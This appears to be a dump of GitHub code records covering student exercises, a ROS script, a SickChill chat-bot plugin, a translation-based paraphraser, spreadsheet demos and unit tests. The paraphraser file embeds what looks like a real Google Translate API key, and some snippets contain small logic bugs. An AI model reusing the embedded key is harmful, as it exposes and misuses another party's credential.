error404(error):\n return template('pagenotfound', pageTitle = 'Fel!' )\n\n@route('/static/')\ndef server_static(filename):\n return static_file(filename, root=\"static\")\n\n\napp = SessionMiddleware(app(), log.session_opts)\nrun(app=app)\n","repo_name":"j-j-hoff/Questway","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73686857448","text":"maior = 0\nmenor = 0\nnumeros = []\nfor x in range(0, 5):\n numeros.append(int(input('Digite um número inteiro: ')))\n if x == 0:\n maior = menor = numeros[x]\n elif numeros[x] > maior:\n maior = numeros[x]\n elif numeros[x] < maior:\n menor = numeros[x]\nprint(f'A lista de números digitadas foi {numeros}')\nprint(f'O maior número foi {maior} e está na posição: ', end='')\nfor p, n in enumerate(numeros):\n if n == maior:\n print(f'{p}...', end='')\nprint(f'\\nO menor número foi {menor} e está na posição: ', end='')\nfor p, n in enumerate(numeros):\n if n == menor:\n print(f'{p}...', end='')","repo_name":"hectorrobertoantunes/exercicios","sub_path":"ex078b.py","file_name":"ex078b.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"340366978","text":"config, instructions = [part.split(\"\\n\") for part in open(\"input.txt\", \"r\").read().split(\"\\n\\n\")]\nstacks = [[] for i in range(max([int(s) for s in config[-1].split() if s.isdigit()]))]\nfor line in config[:-1]:\n for i, box in enumerate(line[1::4]):\n if box != ' ': stacks[i] += box\n \nstack1, stack2 = stacks[:], stacks[:]\nfor line in instructions:\n n, src, dest = [int(s) for s in line.split() if s.isdigit()]\n stack1[src-1], stack1[dest-1] = stack1[src-1][n:], stack1[src-1][:n][::-1] + stack1[dest-1]\n stack2[src-1], stack2[dest-1] = stack2[src-1][n:], stack2[src-1][:n] + stack2[dest-1]\n\nprint('Task 1: ', ''.join(s[0] for s in stack1 if s))\nprint('Task 2: ', ''.join(s[0] for s in stack2 if s))","repo_name":"rklimpel/Advent-of-Code-2022","sub_path":"05/fancy.py","file_name":"fancy.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23589889074","text":"import numpy as np\nimport sys\nimport numba\n\ndef simulate_gbm(n, s, r, div_yield, t, t_terminal, dt, sigma, method = \"euler\", seed = None):\n \"\"\"\n Simulate a geometric brownian motion path\n :param n: Number of simulations\n :param s: Stock price at time t\n :param r: Risk free interest rate\n :param div_yield: Continuous dividend yield\n :param t_terminal: Terminal time\n :param t: Starting time\n :param dt: Discretization time step size\n :param sigma: Volatility\n :param method: Simulation method, either \"euler\" or \"milstein\"\n :param seed: Random seed used\n :return: An array containing the n simulations as rows and the time steps as columns\n \"\"\"\n\n # Set the seed\n if seed is not None:\n np.random.seed(seed)\n\n # Total time steps\n t_total = int((t_terminal - t) / dt)\n\n # Random normal generation\n z = np.random.randn(n, t_total)\n\n # Fill in the simulation matrix\n s_t = dispatch_simulation(n, s, r, div_yield, dt, sigma, z, method)\n\n return s_t\n\n\ndef dispatch_simulation(n, s, r, div_yield, dt, sigma, z, method):\n '''\n Dispatch the simulation to the appropriate algorithm\n :return: s_t filled with the simulation values\n '''\n\n if method == \"euler\":\n\n s_t = simulate_gbm_euler(n, s, r, div_yield, dt, sigma, z)\n\n elif method == \"milstein\":\n\n s_t = simulate_gbm_milstein(n, s, r, div_yield, dt, sigma, z)\n\n else:\n\n sys.exit(\"Method not supported.\")\n\n return s_t\n\n\ndef simulate_gbm_euler(n, s, r, div_yield, dt, sigma, z):\n '''\n GBM simulation using a Euler discretization\n :return: s_t filled with the simulation values by Euler\n '''\n\n cumprod_z = np.cumprod(1 + (r - div_yield) * dt + sigma * np.sqrt(dt) * z,\n axis = 1)\n\n cumprod_z = np.column_stack((np.ones([n, 1]), cumprod_z))\n\n s_t = s * cumprod_z\n\n return s_t\n\n\ndef simulate_gbm_milstein(n, s, r, div_yield, dt, sigma, z):\n '''\n GBM simulation using a Milstein discretization\n :return: s_t filled with the simulation values by Milstein\n '''\n\n cumprod_z = np.cumprod(1 + (r - div_yield) * dt + sigma * np.sqrt(dt) * z \\\n + .5 * sigma * sigma * ((np.sqrt(dt) * z) ** 2 - dt),\n axis = 1)\n\n cumprod_z = np.column_stack((np.ones([n, 1]), cumprod_z))\n\n s_t = s * cumprod_z\n\n return s_t","repo_name":"DavisVaughan/uncc-math-6204","sub_path":"assignments/hw-03 efficient/gbm_simulator.py","file_name":"gbm_simulator.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18564363775","text":"#!/usr/bin/env python\n\nimport rospy\nfrom rospy import Time, Duration\nfrom geometry_msgs.msg import Twist, Pose\nfrom nav_msgs.msg import Odometry\nimport math\nfrom datetime import datetime\nimport time\n\n\ndef zad1():\n VEL_LIN = 0.08*2.4\n VEL_ANG = 0.09*2.4\n\n TURN_RIGHT = 0\n SIDE_LENGHT = 1.0\n\n pub = rospy.Publisher('key_vel', Twist, queue_size=10)\n sub = rospy.Subscriber(\"/mobile_base_controller/odom\", Odometry, callback)\n rospy.init_node('zad1', anonymous=True)\n rate = rospy.Rate(50) # 10hz\n\n vel = Twist()\n\n i = 0\n while not rospy.is_shutdown():\n i+=1\n global time_now\n if i>2:\n \n now = rospy.Time.now()\n time_now = now.secs + float(now.nsecs)/1000000000\n lin, ang = go_square(SIDE_LENGHT, TURN_RIGHT, VEL_LIN, VEL_ANG)\n vel.linear.x = lin\n vel.angular.z = ang\n\n if i == 2:\n global start_time\n now = rospy.Time.now()\n start_time = now.secs + float(now.nsecs)/1000000000\n \n pub.publish(vel)\n rate.sleep()\n\n\ndef callback(data):\n global pose\n pose = Pose()\n pose = data.pose.pose\n\n\ndef calc_time_lin(a, vel_lin):\n return a/vel_lin\n\n\ndef calc_time_ang(vel_ang):\n return (math.pi/2)/vel_ang\n\n\ndef go_square(side_lenght, turn_right, vel_lin, vel_ang):\n global start_time\n\n TIME_LIN = calc_time_lin(side_lenght, vel_lin)\n TIME_ANG = calc_time_ang(vel_ang)\n\n duration = time_now - start_time\n print(duration)\n if duration < TIME_LIN:\n lin = vel_lin\n ang = 0\n elif duration >= TIME_LIN and duration <= TIME_LIN + TIME_ANG:\n lin = 0.0\n if turn_right:\n ang = -vel_ang\n else:\n ang = vel_ang\n else:\n start_time = time_now\n lin = 0\n ang = 0\n\n\n return lin, ang\n\n\nif __name__ == '__main__':\n try:\n zad1()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"kamil-szczepanik/Control-and-Simulation-of-Robots","sub_path":"mobile/scripts/lab1/zad1.py","file_name":"zad1.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20561624329","text":"import os\nfrom abc import ABC, abstractmethod\nimport json\nimport argparse\nimport re\nfrom collections import defaultdict\n\n\nimport requests\nimport logging\nfrom html import unescape as htmlue\nfrom nltk.translate.bleu_score import sentence_bleu\nfrom cat.simulation.nlg import common\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\n\nclass AbstractParaphraser(ABC):\n ESCAPE_SYM = '#'\n ESCAPE_PATTERN = re.compile(f'{ESCAPE_SYM}([a-zA-Z_]*)')\n\n def __init__(self, name):\n self.name = name\n\n def paraphrase_file(self, input_path: str, output_path: str, compute_bleu=True):\n out_data = []\n with open(input_path, mode='r', encoding='utf-8') as sents_file:\n for line in sents_file.readlines():\n sent = line.strip('\\n').strip()\n logger.info(f'Input: {sent}')\n paraphrased = self.paraphrase_sentence(sent=sent)\n logger.info(f'Output: {paraphrased}')\n bleu = sentence_bleu([self._sent_to_tokens(paraphrased)],\n self._sent_to_tokens(sent)) if compute_bleu else None\n out_data.append({'input': sent, 'output': paraphrased, 'bleu': bleu})\n with open(output_path, mode='w', encoding='utf-8') as out_file:\n json.dump(out_data, out_file, indent=2)\n\n def _sent_to_tokens(self, sent, split_sym=' '):\n return sent.split(split_sym)\n\n def _escape_placeholders(self, sent: str) -> str:\n placeholders = common.get_template_placeholders(sent)\n escaped_placedholders = dict([(placeholder, f'{self.ESCAPE_SYM}{placeholder}') for placeholder in placeholders])\n return sent.format(**escaped_placedholders)\n\n def _unescape_placeholders(self, original: str, escaped: str) -> str:\n unescaped = self.ESCAPE_PATTERN.sub(r'{\\1}', escaped)\n tokenized = self._sent_to_tokens(unescaped)\n for i, token in enumerate(tokenized):\n if re.findall('{(.+?)}', token):\n lower_placeholder = token.lower()\n tokenized[i] = lower_placeholder\n unescaped = ' '.join(tokenized)\n original_ph = common.get_template_placeholders(original)\n new_ph = common.get_template_placeholders(unescaped)\n unknown_placeholders = set(new_ph) - set(original_ph)\n if len(unknown_placeholders) > 0:\n logger.error(f'Unknown placeholders {unknown_placeholders}')\n return None\n for ph in original_ph:\n if f'{{{ph}}}' not in unescaped:\n logger.error(f'Missing placeholder {{{ph}}} in back translation {unescaped}')\n return None\n return unescaped\n\n @abstractmethod\n def paraphrase_sentence(self, sent: str):\n pass\n\n @abstractmethod\n def paraphrase_word(self, token: str):\n pass\n\n\nclass PPDBParaphraser(AbstractParaphraser):\n PPDB_RAW = 'ppdb'\n PPDB_JSON = 'ppdb.json'\n\n def __init__(self):\n current_path = os.path.dirname(os.path.realpath(__file__))\n json_path = os.path.join(current_path, self.PPDB_JSON)\n if not os.path.exists(json_path):\n self._preprocess()\n with open(json_path, 'r') as f:\n self.paraphrases = json.load(f)\n AbstractParaphraser.__init__(self, 'ppdb')\n\n def _preprocess(self):\n current_path = os.path.dirname(os.path.realpath(__file__))\n raw_path = os.path.join(current_path, self.PPDB_RAW)\n ppdb_dict = defaultdict(list)\n with open(raw_path, 'r') as pp_file:\n for line in pp_file:\n columns = line.strip().split(' ||| ')\n if len(columns) < 6:\n continue\n if columns[5] != 'Equivalence':\n continue\n word = columns[1]\n paraphrase = columns[2]\n if paraphrase not in ppdb_dict[word]:\n ppdb_dict[word].append(paraphrase)\n dump_path = os.path.join(current_path, self.PPDB_JSON)\n with open(self.PPDB_JSON, 'w') as out_file:\n json.dump(ppdb_dict, out_file, sort_keys=True)\n\n def paraphrase_sentence(self, sent: str):\n paraphrased = []\n for word in self._sent_to_tokens(sent):\n paraphrase = self.paraphrase_word(word)\n paraphrased.append(paraphrase)\n return ' '.join(paraphrased)\n\n def paraphrase_word(self, token: str):\n possibilities = self.paraphrases.get(token, [])\n if len(possibilities) == 0:\n return token\n return possibilities[0] # random.choice(possibilities)\n\n\nclass AbstractPivotParaphraser(AbstractParaphraser, ABC):\n def __init__(self, name):\n AbstractParaphraser.__init__(self, name)\n\n\nclass GooglePivotParaphraser(AbstractPivotParaphraser):\n URL = 'https://translation.googleapis.com/language/translate/v2'\n API_KEY = 'AIzaSyA2AhHSZ5qCf-aJEPXczK2n2lMpS3Amlis'\n\n def __init__(self, languages):\n self.languages = languages\n AbstractPivotParaphraser.__init__(self, 'google')\n\n def paraphrase_sentence(self, sent: str) -> str:\n translation = self._multi_translation(sent, self.languages)\n return translation\n\n def paraphrase_word(self, word: str) -> str:\n translation = self._multi_translation(word, self.languages)\n return translation\n\n def _multi_translation(self, text: str, languages=['en', 'de', 'fr', 'zh-CN', 'en']) -> str:\n if len(set(languages)) < 2:\n raise Exception('Need at least one intermediate language for pivot paraphrasing but got ' + languages)\n base = self._escape_placeholders(text)\n translation = base\n for i in range(len(languages) - 1):\n src_lang = languages[i]\n target_lang = languages[i + 1]\n translation = self._query_translation(text=translation, source=src_lang, target=target_lang)\n return self._unescape_placeholders(text, translation)\n\n def _query_translation(self, text: str, source: str = 'en', target='de') -> str:\n params = {'q': text, 'source': source, 'target': target, 'key': self.API_KEY}\n r = requests.post(url=self.URL, data=params)\n if r.status_code == 403:\n return self._query_translation(text, source, target)\n response = json.loads(htmlue(r.text))\n translations = response.get('data', {}).get('translations', [])\n return [translation.get('translatedText', text) for translation in translations][0]\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-q', '--query', type=str,\n help='Input query to paraphrase. Can contain escaped characters in curly brackets')\n parser.add_argument('-i', '--in_file', type=str, help='Line separated list of queries')\n parser.add_argument('-o', '--out_file', type=str, help='Output file to write json to')\n parser.add_argument('-l', '--languages', type=str, nargs='*',\n help='The languages to use for pivot translation. First languages is appended as target automatically. Language abbreviations are not validated')\n parser.add_argument('-b', '--bleu', type=bool, default=True, help='Wether to compute and log the BLEU score')\n parser.add_argument('-p', '--paraphraser', default='g',\n help='Type of paraphraser. \"g\" for Google Translate API, \"p\" for PPDB paraphraser')\n args = parser.parse_args()\n\n query = args.query\n in_file = args.in_file\n if query and in_file:\n logger.error('Can either specify query or input file to paraphrase')\n exit(1)\n if not (query or in_file):\n logger.error('Must either specify query or input file to paraphrase')\n exit(1)\n if args.in_file and not args.out_file:\n logger.error(f'Missing argument \"-o\"/\"--out_file\" for file paraphrasation')\n exit(1)\n\n languages = []\n paraphrase_type = args.paraphraser\n if paraphrase_type == 'p':\n p = PPDBParaphraser()\n elif not paraphrase_type == 'g':\n logger.warning(f'Unknown paraphraser type \"{paraphrase_type}\", using default paraphraser \"g\"')\n paraphrase_type = 'g'\n if paraphrase_type == 'g':\n languages = args.languages\n if not languages or len(set(languages)) < 2:\n logger.error('At least two languages required for pivot paraphrasing')\n exit(1)\n if not languages[0] == languages[-1]:\n languages.append(languages[0])\n p = GooglePivotParaphraser(languages=languages)\n\n if query:\n logger.info(f'Input Sentence: {query}')\n paraphrase = p.paraphrase_sentence(query)\n logger.info(f'Output Sentence: {paraphrase}')\n else:\n p.paraphrase_file(input_path=in_file, output_path=args.out_file, compute_bleu=args.bleu)\n","repo_name":"DataManagementLab/CAT","sub_path":"cat/simulation/nlg/paraphrasing.py","file_name":"paraphrasing.py","file_ext":"py","file_size_in_byte":8833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70640602727","text":"# vim: ft=python fileencoding=utf-8 sw=4 et sts=4\n\n\"\"\"Unit tests for pypytextable.\"\"\"\n\nimport pytest\n\nfrom pytextable import _pytextable\n\n\ndef test_wrap_tex_environment():\n text = \"My custom text\"\n expected = f\"\\\\begin{{center}}\\n {text}\\n\\\\end{{center}}\\n\"\n assert _pytextable._wrap_tex_environment(\"center\", text) == expected\n\n\ndef test_wrap_tex_environment_cmd():\n text = \"My custom text\"\n cmd = \"lll\"\n expected = f\"\\\\begin{{tabular}}{{{cmd}}}\\n {text}\\n\\\\end{{tabular}}\\n\"\n assert _pytextable._wrap_tex_environment(\"tabular\", text, cmd=cmd) == expected\n\n\ndef test_wrap_tex_environment_options():\n text = \"My custom text\"\n options = \"lll\"\n expected = f\"\\\\begin{{tabular}}[{options}]\\n {text}\\n\\\\end{{tabular}}\\n\"\n assert (\n _pytextable._wrap_tex_environment(\"tabular\", text, options=options) == expected\n )\n\n\n@pytest.mark.parametrize(\"data\", [[[1, 2]], [[1, 2, 3]]])\ndef test_n_columns(data):\n assert len(data[0]) == _pytextable._get_num_columns(data)\n\n\ndef test_fail_columns():\n data = [\n (1, 2, 3),\n (1, 2, 3),\n (1, 2, 3),\n (1, 2, 3, 4),\n ]\n with pytest.raises(ValueError, match=\"All rows must have the same number\"):\n _pytextable._get_num_columns(data)\n\n\n@pytest.mark.parametrize(\n \"alignment, n_columns, expected\",\n (\n (\"l\", 3, \"lll\"),\n (\"r\", 2, \"rr\"),\n (\"c\", 4, \"cccc\"),\n (\"l|\", 3, \"l|l|l\"),\n (\"|l|\", 3, \"|l|l|l|\"),\n (\"\", 3, \"ccc\"),\n (\"llc\", 3, \"llc\"),\n (\"|ll|l|\", 3, \"|ll|l|\"),\n ),\n)\ndef test_table_alignment(alignment, n_columns, expected):\n assert _pytextable._table_alignment(alignment, n_columns) == expected\n\n\ndef test_fail_table_alignment_chars():\n with pytest.raises(ValueError, match=\"Invalid alignment\"):\n _pytextable._table_alignment(\"llb\", 3)\n\n\ndef test_fail_table_alignment_n_separators():\n with pytest.raises(ValueError, match=\"Too many |\"):\n _pytextable._table_alignment(\"|l|||\", 3)\n\n\n@pytest.mark.parametrize(\"alignment\", (\"ll\", \"llll\"))\ndef test_fail_table_alignment_n_chars(alignment):\n with pytest.raises(ValueError, match=\"Number of alignment\"):\n _pytextable._table_alignment(alignment, 3)\n","repo_name":"karlch/pytextable","sub_path":"tests/test_unit.py","file_name":"test_unit.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6641385426","text":"import requests\nimport json\nimport urllib\n\n\nclass sickChill(object):\n\n def __init__(self, couchURL, apikey, whitelistedusers):\n self.sickURL = couchURL\n self.apiKey = apikey\n self.users = whitelistedusers\n\n def begin(self, command, user):\n # make the command lower for all functions\n command = command.lower()\n response = None\n needs_help = False\n if user not in self.users:\n return \"This function is currently only avaliable to contributors to say thanks\"\n if 'tv today' in command:\n return self.getToday()\n elif 'tv latest' in command:\n return self.getLatest()\n elif 'tv search' in command:\n return self.getSearch(command.replace(\"tv search\", \"\"))\n elif 'tv download' in command:\n return self.getDownload(command.replace(\"tv download\", \"\"))\n elif command[-1] == '?':\n return \"No.\", False\n else:\n return \"Invalid Command\", False\n\n def getDownload(self, searchstr):\n sick = sickChillAPI(self.sickURL, self.apiKey)\n download = sick.downloadTvShow(searchstr)\n if download == \"An existing indexerid already exists in database\":\n return \"Tv Show allready added\", False\n elif \"could not be parsed into\" in download:\n return \"Tv Show ID invalid, Full Error: \" + download, False\n elif \"queued to be added\" in download:\n return \"Success: \" + download + \"\\n *WARNING: This will only add future episodes, contact steve to add past episodes*\", False\n return download, False\n\n def getSearch(self, seachstr):\n sick = sickChillAPI(self.sickURL, self.apiKey)\n tvshows = sick.searchTvShows(seachstr)\n if tvshows == \"Empty\":\n return \"No tvshows found\", False\n showlist = []\n for show in tvshows:\n fields = []\n fields.append({\"short\": False, \"title\": show[\"name\"], \"value\": \"*First Aired:* \" + show[\"first_aired\"] + \"\\n*Allready added:* \" + show[\"in_show_list\"] + \"\\n*ShowID:* \" + str(show[\"id\"])})\n showlist.append({\"fallback\": \"blah\", \"fields\": fields})\n # message = [{\"fallback\": \"blah\", \"pretext\": \"The following shows will download today:\", \"fields\": showlist}]\n message = showlist\n return message, True\n\n def getToday(self):\n sick = sickChillAPI(self.sickURL, self.apiKey)\n tvtoday = sick.Today()\n if tvtoday == \"Empty\":\n return \"No shows airing today\", False\n showlist = []\n for show in tvtoday:\n fields = []\n fields.append({\"short\": False, \"title\": show[\"showname\"], \"value\": \"*Episode:* \" + show[\"showepisode\"] + \"\\n*Airs:* \" + show[\"airs\"] + \"\\n*Quality:* \" + show[\"quality\"]})\n showlist.append({\"fallback\": \"blah\", \"fields\": fields})\n # message = [{\"fallback\": \"blah\", \"pretext\": \"The following shows will download today:\", \"fields\": showlist}]\n message = showlist\n return message, True\n\n def getLatest(self):\n sick = sickChillAPI(self.sickURL, self.apiKey)\n tvtoday = sick.Today()\n tvlatest = sick.Latest()\n if tvtoday == \"Empty\":\n tvtoday = []\n if tvlatest == \"Empty\":\n tvlatest = []\n if len(tvlatest) == 0 & len(tvtoday) == 0:\n return \"Now shows in the next 7 days\", False\n showlist = []\n for show in tvtoday:\n fields = []\n fields.append({\"short\": False, \"title\": show[\"showname\"], \"value\": \"*Episode:* \" + show[\"showepisode\"] + \"\\n*Airs:* \" + show[\"airs\"] + \"\\n*Quality:* \" + show[\"quality\"]})\n showlist.append({\"fallback\": \"Todays Shows\", \"fields\": fields})\n for show in tvlatest:\n fields = []\n fields.append({\"short\": False, \"title\": show[\"showname\"], \"value\": \"*Episode:* \" + show[\"showepisode\"] + \"\\n*Airs:* \" + show[\"airs\"] + \"\\n*Quality:* \" + show[\"quality\"]})\n showlist.append({\"fallback\": \"Next 7 days shows\", \"fields\": fields})\n # message = [{\"fallback\": \"blah\", \"pretext\": \"The following shows will download today:\", \"fields\": showlist}]\n message = showlist\n return message, True\n\n\nclass sickChillAPI:\n\n def __init__(self, url, apikey):\n self.rooturl = url\n self.apikey = apikey\n\n def Today(self):\n url = self.rooturl + '/api/' + self.apikey + '/?cmd=future&type=today'\n request = requests.get(url)\n json_data = json.loads(request.text)\n if json_data[\"result\"] != \"success\":\n return False\n elif json_data[\"result\"] == \"success\":\n if len(json_data[\"data\"][\"today\"]) == 0:\n return \"Empty\"\n shows = []\n for show in json_data[\"data\"][\"today\"]:\n ishow = {}\n ishow[\"showname\"] = show[\"show_name\"]\n ishow[\"showepisode\"] = show[\"ep_name\"]\n ishow[\"quality\"] = show[\"quality\"]\n ishow[\"airs\"] = show[\"airs\"]\n shows.append(ishow)\n return shows\n\n def Latest(self):\n url = self.rooturl + '/api/' + self.apikey + '/?cmd=future&type=soon'\n request = requests.get(url)\n json_data = json.loads(request.text)\n if json_data[\"result\"] != \"success\":\n return False\n elif json_data[\"result\"] == \"success\":\n if len(json_data[\"data\"][\"soon\"]) == 0:\n return \"Empty\"\n shows = []\n for show in json_data[\"data\"][\"soon\"]:\n ishow = {}\n ishow[\"showname\"] = show[\"show_name\"]\n ishow[\"showepisode\"] = show[\"ep_name\"]\n ishow[\"quality\"] = show[\"quality\"]\n ishow[\"airs\"] = show[\"airs\"]\n shows.append(ishow)\n return shows\n\n def searchTvShows(self, search):\n url = self.rooturl + '/api/' + self.apikey + '/?cmd=sb.searchindexers&only_new=0&name=' + search\n request = requests.get(url)\n json_data = json.loads(request.text)\n if json_data[\"result\"] != \"success\":\n return False\n elif json_data[\"result\"] == \"success\":\n if len(json_data[\"data\"][\"results\"]) == 0:\n return \"Empty\"\n shows = []\n for show in json_data[\"data\"][\"results\"]:\n ishow = {}\n ishow[\"first_aired\"] = show[\"first_aired\"]\n if show[\"in_show_list\"] is True:\n ishow[\"in_show_list\"] = \"Yes\"\n else:\n ishow[\"in_show_list\"] = \"No\"\n ishow[\"name\"] = show[\"name\"]\n ishow[\"id\"] = show[\"tvdbid\"]\n shows.append(ishow)\n return shows\n\n def downloadTvShow(self, id):\n url = self.rooturl + '/api/' + self.apikey + \"?cmd=show.addnew&indexerid=268592&status=ignored&tvdbid=\" + id\n request = requests.get(url)\n json_data = json.loads(request.text)\n if json_data[\"result\"] != \"success\":\n return json_data[\"message\"]\n elif json_data[\"result\"] == \"success\":\n return json_data[\"message\"]\n","repo_name":"OneLogicalMyth/monkey-bot","sub_path":"plugins/sickPotatoBot.py","file_name":"sickPotatoBot.py","file_ext":"py","file_size_in_byte":7170,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"6353681747","text":"import typing\n\nfrom sticker_parser.api import API\nfrom sticker_parser.models import StickerPack\n\n\nasync def get_section_sticker_packs(api: API, section_id: str, next_from: str = None) -> typing.List[dict]:\n packs = []\n data = api.send_api_request(\"catalog.getSection\", {\"section_id\": section_id, \"start_from\": next_from})\n if 'next_from' in data['response']['section'] and data['response']['section']['next_from']:\n packs += await get_section_sticker_packs(api, section_id, data['response']['section']['next_from'])\n return packs + list(map(lambda x: x[1], data['response']['stickers_packs'].items()))\n\n\nasync def get_all_sticker_packs(api: API) -> typing.List[dict]:\n packs = []\n sections = api.send_api_request(\"catalog.getStickers\", {\"need_blocks\": 0})\n for section in sections['response']['catalog']['sections']:\n packs += await get_section_sticker_packs(api, section['id'])\n\n unique_packs = []\n packs_ids = []\n\n for pack in packs:\n if pack['product']['id'] in packs_ids:\n continue\n packs_ids.append(pack['product']['id'])\n unique_packs.append(pack)\n return sorted(unique_packs, key=lambda x: x['product']['id'])\n\n\nasync def get_all_stickers(api: API, sticker_packs: typing.List[dict]) -> typing.List[dict]:\n keywords = api.send_api_request(\"store.getStickersKeywords\", {\n \"aliases\": 1,\n \"all_products\": 1,\n \"need_stickers\": 0\n })\n stickers = []\n for sticker_pack in sticker_packs:\n stickers += [\n {**sticker, \"product_id\": sticker_pack['product']['id']}\n for sticker in sticker_pack['product']['stickers']\n ]\n for dictionary in keywords['response']['dictionary']:\n for sticker in dictionary['stickers']:\n for index in range(len(stickers)):\n if stickers[index]['sticker_id'] == sticker['sticker_id']:\n stickers[index]['keywords'] = dictionary['words']\n break\n\n return stickers\n\n\nasync def collect_user_stickers(api: API, user_id: int) -> typing.List[dict]:\n gifts = api.send_api_request(\"gifts.getCatalog\", {\n \"no_inapp\": 0,\n \"user_id\": user_id,\n \"force_payment\": 1\n })\n stickers_gifts = [s for s in gifts['response'] if s['name'] in {'stickers_popular', 'stickers'}]\n stickers = []\n for sticker_gift in stickers_gifts:\n stickers += [item for item in sticker_gift['items'] if item.get('disabled', False)]\n stickers_ids = set([s['gift']['stickers_product_id'] for s in stickers])\n return [await sticker_pack.dict() async for sticker_pack in StickerPack.filter(id__in=stickers_ids)]\n\n\n\n","repo_name":"lordralinc/sticker_parser","sub_path":"sticker_parser/collectors.py","file_name":"collectors.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23897705727","text":"#pip means preffered installer programmer\r\nimport xlsxwriter\r\nworkbook=xlsxwriter.Workbook('employer.xlsx')\r\nworksheet=workbook.add_worksheet(\"My Sheet\")\r\nworksheet.write('A1','Hello')\r\nworksheet.write('A2','welcome')\r\nworksheet.write('A3','xlsxwriter')\r\nworksheet.write('A4','module')\r\nworkbook.close()\r\n\r\nprint(\"^^^^^^^^^^^^^^\")\r\n\r\nimport xlsxwriter\r\nworkbook=xlsxwriter.Workbook('employer.xlsx')\r\nworksheet=workbook.add_worksheet(\"My Sheet\")\r\nr=c=0\r\nl=['Gana' ,\"Vikas\", 'Anant']\r\nfor i in l:\r\n worksheet.write(r,c,i)\r\n r +=1\r\nworkbook.close()\r\nprint(\"&&&&&&&\")\r\n\r\nimport xlsxwriter\r\nworkbook=xlsxwriter.Workbook('employer.xlsx')\r\nworksheet=workbook.add_worksheet(\"My Sheet\")\r\nr=c=0\r\nl=[['Gana',30000] ,[\"Vikas\",29000], ['Anant',30000]]\r\nfor i in l:\r\n worksheet.write(r,c,i[0])\r\n c +=1\r\n worksheet.write(r,c,i[1])\r\n r +=1\r\n c=0\r\nworkbook.close()\r\n\r\nprint(\"%%%%%%%%\")\r\n\r\n\r\n\r\n'''import sqlite3\r\nconn=sqlite3.connect('example.db')\r\nname=input(\"Enter name:\")\r\ncursor=conn.cursor()\r\n\r\n\r\ntry:\r\n cursor.execute(\"INSERT INTO employee (name) VALUES (?)\",(name, ))\r\n conn.commit()\r\n print(\"'%d' record inserted\" %(cursor.rowcount))\r\nexcept Exception as e:\r\n print(\"Error:\",e)\r\nfinally:\r\n conn.close()'''\r\n\r\n\r\nimport sqlite3\r\nimport xlsxwriter\r\nworkbook=xlsxwriter.Workbook('demo1.xlsx')\r\nworksheet=workbook.add_worksheet(\"My Data\")\r\nconn=sqlite3.connect('example.db')\r\ncursor=conn.cursor()\r\nr=c=0\r\n\r\ntry:\r\n cursor.execute(\"\"\"select * from employee\"\"\")\r\n d=cursor.fetchall()\r\n for i in d:\r\n worksheet.write(r,c,i[0])\r\n c +=1\r\n worksheet.write(r,c,i[1])\r\nexcept Exception as e:\r\n print(\"Error:\",e)\r\nfinally:\r\n conn.close()","repo_name":"Mahesh2357/Python_Tutorials_23","sub_path":"day 29 last day.py","file_name":"day 29 last day.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75297901928","text":"import os\nimport pickle\n\nfrom tensorflow.keras.models import load_model\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import classification_report, confusion_matrix\n\nimport src.utils as utils\n\n\nclass Estimator:\n def __init__(\n self, src_dir, dst_dir,\n est_file, cls_file, drs_file, srs_file, input_size):\n self.src_dir = src_dir\n self.dst_dir = dst_dir\n self.est_file = est_file\n self.cls_file = cls_file\n self.drs_file = drs_file\n self.srs_file = srs_file\n self.input_size = input_size\n\n def execute(self):\n estimator = load_model(self.est_file)\n\n with open(self.cls_file, 'rb') as f:\n cls_info = pickle.load(f)\n\n pred_labels, true_labels, output = [], [], []\n\n for subdir in os.listdir(self.src_dir):\n for f in os.listdir(os.path.join(self.src_dir, subdir)):\n filename = os.path.join(self.src_dir, subdir, f)\n img = utils.load_target_image(filename, self.input_size)\n pred_class = np.argmax(estimator.predict(img))\n pred_label = cls_info[pred_class]\n pred_labels.append(pred_label)\n\n true_label = subdir\n true_labels.append(true_label)\n\n output.append(f'{filename} -> {pred_label}')\n\n report = classification_report(true_labels, pred_labels)\n labels = list(cls_info.values())\n cnfmtx = confusion_matrix(true_labels, pred_labels, labels)\n cm = pd.DataFrame(cnfmtx, index=labels, columns=labels)\n\n utils.mkdir(self.dst_dir, rm=True)\n with open(self.drs_file, 'w') as f:\n f.writelines(output)\n\n with open(self.srs_file, 'w') as f:\n f.write(report)\n f.write('¥n¥n')\n f.write(str(cm))\n f.write('¥n')\n","repo_name":"fyk7/keras_image_cookiecutter","sub_path":"src/models/estimator.py","file_name":"estimator.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7923364042","text":"import spacy \nfrom spacy.matcher import Matcher\nimport json\n\nnlp = spacy.load(\"en_core_web_sm\")\n\nmatcher = Matcher(nlp.vocab)\npattern = [\n {\"LIKE_EMAIL\":True}\n]\nmatcher.add(\"EMAIL_ADDRESS\", 